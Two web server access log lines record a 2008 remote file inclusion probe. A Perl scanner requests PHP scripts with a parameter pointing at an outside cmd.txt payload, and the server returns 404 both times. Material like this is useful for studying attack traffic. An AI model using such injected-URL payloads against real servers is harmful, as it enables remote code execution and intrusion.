75.125.143.162 - - [29/Jul/2008:11:05:05 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:11:05:06 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
